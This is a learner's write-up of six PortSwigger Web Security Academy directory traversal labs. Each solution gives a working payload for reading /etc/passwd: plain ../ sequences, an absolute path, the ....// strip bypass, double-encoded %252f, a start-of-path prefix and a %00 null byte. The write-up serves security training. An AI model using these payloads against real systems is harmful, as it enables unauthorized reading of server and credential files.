---
title: 'Directory Traversal'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# File path traversal, simple case

<https://portswigger.net/web-security/file-path-traversal/lab-simple>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Edit the filename URL parameter value as so, then send that request:

    ```
	/image?filename=../../../etc/passwd
    ```

    The contents of `/etc/passwd` are not displayed on the page, but are found within the response.




# File path traversal, traversal sequences blocked with absolute path bypass

<https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
> The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Navigate to:

    ```
	https://0a6d007003b2d2cac0ecdb1a00fd0032.web-security-academy.net/image?filename=/etc/passwd
    ```
    The application blocks `../` traversal indicators, but we can just provide the absolute file path to the file of interest.

    The response contains the contents of the file.




# File path traversal, traversal sequences stripped non-recursively

<https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
> The application strips path traversal sequences from the user-supplied filename before using it.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Navigate to the following:

    ```
	https://0ae0006f04a50fb4c02959eb009700ce.web-security-academy.net/image?filename=....//....//....//etc/passwd
    ```

    The contents of the file are in the response.




# File path traversal, traversal sequences stripped with superfluous URL-decode

<https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
> The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Navigate to the following:

    ```
	/image?filename=..%252f..%252f..%252fetc/passwd
    ```

	- `/` URL-encodes to `%2f`
    - `%` URL-encodes to `%25`

	So, double URL-encoding `/` leads to `%252f`

    The contents of the file are included in the response.




# File path traversal, validation of start of path

<https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
> The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Inspect an image on the home page. The `src` contains the absolute path to the file in the `filename` parameter
1. Navigate to the following:

    ```
	https://0a0800e60473d2b5c6c3103400da00e0.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
    ```

    The contents of the file are included in the response.




# File path traversal, validation of file extension with null byte bypass

<https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab contains a file path traversal vulnerability in the display of product images.
>
> The application validates that the supplied filename ends with the expected file extension.
>
>> To solve the lab, retrieve the contents of the `/etc/passwd` file.


## Solution

1. Inspect an image on the home page. It is a `.jpg` file
1. Navigate to:

    ```
	/image?filename=../../../etc/passwd%00.jpg
    ```

    The contents of the file are included in the response.

